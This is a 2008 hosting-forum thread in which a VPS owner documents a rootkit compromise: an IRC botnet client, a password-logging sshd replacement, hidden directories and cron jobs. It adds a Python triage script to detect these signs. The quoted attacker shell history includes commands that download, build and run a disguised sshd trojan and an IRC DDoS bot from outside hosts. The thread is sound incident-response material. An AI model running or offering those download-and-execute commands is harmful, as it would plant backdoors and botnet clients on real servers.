VPS Hacked - How to Detect


Wade M
02-17-2008, 09:48 AM
Hi Guys,

One of my PVPS' got hacked on the 9th of Feb, and thanks to a flag raised by Abuse today, I looked a bit deeper and found that it'd been rootkit'd. Here's all the junk I found, I suggest you guys check out your boxen and see if you have any of these files...

Peace,

Wade

=================
There was an IRC C&C bot client running:
root@host [~]# lsof |grep 66.252.28.108
k 7188 root 3u IPv4 81089961 TCP host.com:34322->66.252.28.108:ircd (ESTABLISHED)
root@host [~]# kill 7188
root@host [~]# lsof |grep 66.252.28.108

There was a custom copy of SSHD installed and running, which was capturing passwords.

root@host [/dev]# lsof |grep ssh
sshd 3608 root txt REG 0,94 2350288 60871388 /usr/sbin/sshd2

root@host [/usr/sbin]#
-rwxr-xr-x 1 root root 2350288 Feb 9 11:40 sshd2*
-rwxr-xr-x 1 root root 1567702 Feb 9 11:40 sshd-check-conf*
lrwxrwxrwx 1 root root 5 Feb 9 11:40 sshd -> sshd2*

The password capture was being written to /dev/sauxx:
root@host [/dev]# head sauxx
root@210.49.31.177 () [Sat Feb 09 2008 12:13:06 +1100]
root@67.187.23.233 () [Sat Feb 16 2008 08:36:02 +1100]
root@83.170.102.168 () [Sun Feb 17 2008 06:54:19 +1100]

There was a script installed in the crontab:
root@host [/etc/.syslogd]# crontab -l

10 10 * * * /etc/.etc/.sshhost/cron/tempdelete.pl

And they were running WEBMIN on port 21374:
root@host [/etc/.syslogd]# more /etc/.etc/.sshhost/miniserv.conf
port=21374
root=/etc/.etc/.sshhosts
mimetypes=/etc/.etc/.sshhosts/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server

Looking through the webmin logs, they were doing firewall work, god knows why...

24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/red.gif HTTP/1.1" 200 159
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/blue.gif HTTP/1.1" 200 168
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/closed.gif HTTP/1.1" 200 233
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /right.cgi?open=system&open=status HTTP/1.1" 200 1144
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/gohome.gif HTTP/1.1" 200 391
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/stock_quit.gif HTTP/1.1" 200 1084
24.24.83.17 - letmein [10/Feb/2008:07:52:19 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [10/Feb/2008:07:52:19 +1100] "GET /firewall/ HTTP/1.1" 200 342164
24.24.83.17 - letmein [10/Feb/2008:07:52:33 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=67 HTTP/1.1" 200 16135
24.24.83.17 - letmein [10/Feb/2008:07:52:37 +1100] "GET /images/left.gif HTTP/1.1 200 635TP/1.1" 200 16146
24.24.83.17 - letmein [10/Feb/2008:07:57:23 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:57:24 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 342164
24.24.83.17 - letmein [10/Feb/2008:07:57:41 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=77 HTTP/1.1" 200 16147
24.24.83.17 - letmein [10/Feb/2008:07:57:55 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:57:57 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 342087
24.24.83.17 - letmein [10/Feb/2008:07:58:10 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=89 HTTP/1.1" 200 16144
24.24.83.17 - letmein [10/Feb/2008:07:58:34 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:58:36 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 341990
24.24.83.17 - letmein [10/Feb/2008:07:59:20 +1100] "GET /firewall/apply.cgi?table=0 HTTP/1.1" 302 0
128.173.40.43 - - [11/Feb/2008:01:41:59 +1100] "GET / HTTP/1.1" 401 1646
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/images/before.gif HTTP/1.1" 200 84
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/images/up.gif HTTP/1.1" 200 103
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/ HTTP/1.1" 200 341990
128.173.40.43 - letmein [11/Feb/2008:01:44:36 +1100] "GET /firewall/images/down.gif HTTP/1.1" 200 108

They created two hidden directories, .etc and .syslogd. It appears .etc was used for webadmin and .syslogd was used for the IRC client.
root@host [/etc/.etc]# ls -la
total 40
drwxr-xr-x 6 root root 4096 Feb 9 11:49 ./
drwxr-xr-x 64 root root 12288 Feb 18 01:00 ../
drwxrwxr-x 11 500 500 4096 Feb 11 11:53 .sshd-ssl/
drwx------ 115 root bin 4096 Feb 9 11:45 .sshhost/
drwxr-xr-x 121 root bin 12288 Sep 22 07:29 .sshhosts/
drwxr-xr-x 8 root root 4096 Feb 9 11:39 sshd/

root@host [/etc/.syslogd]# ls -la
total 32
drwx------ 3 500 500 4096 Feb 18 00:14 ./
drwxr-xr-x 64 root root 12288 Feb 18 01:00 ../
drwx------ 2 500 500 4096 Jun 17 2006 CVS/
-rw------- 1 500 500 1370 Jun 17 2006 ircdchk.in
-rwx------ 1 root root 1400 Feb 9 11:52 wm_syslogchk*
-rwx------ 1 500 500 75 Feb 29 2000 wm_syslogd*
root@host [/etc/.syslogd]#

Commands they ran:
560 cat /proc/cpuinfo
561 exit
562 w
563 cd /etc/
564 mkdir .etc
565 cd .etc
566 wget http://sshd.uv.ro/ridah.jpg ; tar zxvf ridah.jpg ; rm -rf ridah.jpg ; cd sshd ; ./configure ; make ; make install ; cd /var/run ; ls | grep sshd
567 yum install xorg-x11-xauth
568 cd /etc/.etc/
569 cd sshd
570 ./configure ; make ; make install ; cd /var/run ; ls | grep sshd
571 cd /etc/.etc/
572 wget jaist.dl.sourceforge.net/sourceforge/webadmin/webmin-1.370.tar.gz
573 tar -zxf webmin-1.370.tar.gz
574 rm webmin-1.370.tar.gz
575 mv webmin-1.370 .sshhosts
576 cd .sshhostys
577 cd .sshhosts
578 ./setup.sh
579 /etc/init.d/iptables stop
580 /etc/init.d/iptables start
~
626 wget http://www.hotlinkfiles.com/files/989470_kyqt3/k_041050.c;gcc -o k k_041050.c;./k;rm -rf k;rm -rf k_041050.c
627 wget http://www.hotlinkfiles.com/files/989470_kyqt3/k_041050.c;gcc -o k k_041050.c;./k;rm -rf k_041050.c;rm -rf k
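
The checks in the post above (an IRC session in lsof, a replaced sshd binary, a cron job under a hidden path, dot-directories owned by a bare numeric uid) are the sort of thing worth scripting for the next box. The helpers below are an added example, not code from this thread; the sample inputs are the post's own lsof, crontab and ls -la output plus two constructed benign lines (an httpd connection to 203.0.113.5 and an updatedb cron entry), and the names Finding, triage and friends are this example's own. It assumes the field layout of the lsof and ls -la output shown in the post.

```python
"""Added triage helpers for the indicators in the post above (example code, not
part of the thread). Sample inputs are the thread's own output plus a few
constructed benign lines; names such as Finding/triage are this example's own."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "kind detail")

# lsof output from the post, plus one constructed benign httpd line (203.0.113.5)
LSOF_SAMPLE = """\
k 7188 root 3u IPv4 81089961 TCP host.com:34322->66.252.28.108:ircd (ESTABLISHED)
sshd 3608 root txt REG 0,94 2350288 60871388 /usr/sbin/sshd2
httpd 2210 apache 4u IPv4 81090000 TCP host.com:http->203.0.113.5:51234 (ESTABLISHED)
"""
# crontab from the post, plus one constructed benign entry
CRONTAB_SAMPLE = """\
10 10 * * * /etc/.etc/.sshhost/cron/tempdelete.pl
0 4 * * * /usr/bin/updatedb
"""
# ls -la of /etc/.etc, as shown in the post
LS_SAMPLE = """\
total 40
drwxr-xr-x 6 root root 4096 Feb 9 11:49 ./
drwxr-xr-x 64 root root 12288 Feb 18 01:00 ../
drwxrwxr-x 11 500 500 4096 Feb 11 11:53 .sshd-ssl/
drwx------ 115 root bin 4096 Feb 9 11:45 .sshhost/
drwxr-xr-x 121 root bin 12288 Sep 22 07:29 .sshhosts/
drwxr-xr-x 8 root root 4096 Feb 9 11:39 sshd/
"""

# the ircd service name and the conventional IRC port range
IRC_SERVICES = {"ircd", "7000"} | {str(p) for p in range(6660, 6670)}
HIDDEN_COMPONENT = re.compile(r"/\.[^/.]")  # a dot-directory or dot-file in a path


def find_irc_sockets(lsof_text):
    """Established TCP sessions whose remote service is ircd or a common IRC port."""
    hits = []
    for line in lsof_text.splitlines():
        f = line.split()
        if "(ESTABLISHED)" not in f:
            continue
        conn = next((x for x in f if "->" in x), None)
        if conn is None:
            continue
        remote = conn.split("->", 1)[1]
        if remote.rsplit(":", 1)[-1] in IRC_SERVICES:
            hits.append(Finding("irc-c2", f"{f[0]} pid {f[1]} -> {remote}"))
    return hits


def find_foreign_sshd(lsof_text, expected="/usr/sbin/sshd"):
    """sshd processes whose mapped executable (the txt entry) is not the packaged binary."""
    return [Finding("sshd-binary", f[-1]) for f in map(str.split, lsof_text.splitlines())
            if len(f) > 4 and f[0] == "sshd" and f[3] == "txt" and f[-1] != expected]


def find_hidden_cron_jobs(crontab_text):
    """Cron commands that live under a hidden path component."""
    hits = []
    for line in crontab_text.splitlines():
        parts = line.split(None, 5)  # five schedule fields, then the command
        if len(parts) == 6 and not line.lstrip().startswith("#") \
                and HIDDEN_COMPONENT.search(parts[5]):
            hits.append(Finding("hidden-cron", parts[5]))
    return hits


def find_suspicious_entries(ls_text):
    """Hidden names, and entries owned by a bare numeric uid/gid (no passwd entry,
    typical of a tarball unpacked as root with the packager's ids preserved)."""
    hits = []
    for line in ls_text.splitlines():
        f = line.split()
        if len(f) < 9:  # skips the 'total' line
            continue
        owner, group, name = f[2], f[3], f[-1].rstrip("/*@")
        if name in (".", ".."):
            continue
        if name.startswith("."):
            hits.append(Finding("hidden-entry", name))
        if owner.isdigit() or group.isdigit():
            hits.append(Finding("numeric-owner", f"{name} owned by {owner}:{group}"))
    return hits


def triage(lsof_text=LSOF_SAMPLE, crontab_text=CRONTAB_SAMPLE, ls_text=LS_SAMPLE):
    """Run every check and return the combined list of findings."""
    return (find_irc_sockets(lsof_text) + find_foreign_sshd(lsof_text)
            + find_hidden_cron_jobs(crontab_text) + find_suspicious_entries(ls_text))


if __name__ == "__main__":
    for kind, detail in triage():
        print(f"[{kind}] {detail}")
```

On a live box the samples would be replaced by the output of `lsof -nP`, `crontab -l` for each user and `ls -la` over /etc, /dev and /tmp; the numeric-owner check is the cheap tell here, since the attacker's tarball left 500:500 on directories that nothing legitimate on a root-managed /etc would own.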

Fred
02-17-2008, 10:08 AM
Good post... :)

It looks like they were building a zombie to eventually use it as an IRC bot (to DDoS)...

But they are a bit stupid. I mean, they installed webmin!! And more, they kept the logs of it...

Did you check the code of their "ssh" you found? Was it known?

Do you know how they got in?

Wade M
02-17-2008, 10:19 AM
Hi Fred,

I've kept a copy of all their custom goodies. Haven't been able to read their code yet, it's an encrypted binary. I've got quite a few mates in the security industry who enjoy disassembling rootkits. Will be fun seeing what comes out of it :) I can send a copy to you if you'd like (PM me your e-mail).

I'm pretty sure they got in on the exploit that this thread was created for. The first command run was to check the CPU to make sure that exploit would work on it. If it was just the OS they were after they'd have run uname -a instead, but they went for /proc....

The sshd appears to have come from a Russian site... part of a Russian botnet no less :)

There's an uncompiled file floating around on hotlink (626 and 627 in the history). The .c file's still there, I just grabbed it...

"This is a IRC based distributed denial of service client." Connects to "linx.rr.nu"

Peace,
--Wade

PS 2am local time, going to bed now. It's been a fun night :)

Fred
02-17-2008, 11:04 AM
Yeah, I just read the .c file :)
It's no more than a bot... but it can download, execute... :)
But that was probably the first step before you get really owned...

Yes, I would like to see the "goodies"... As an IT engineering student, that's the kind of thing that would never hurt to read...

PM will be sent in a second or two :)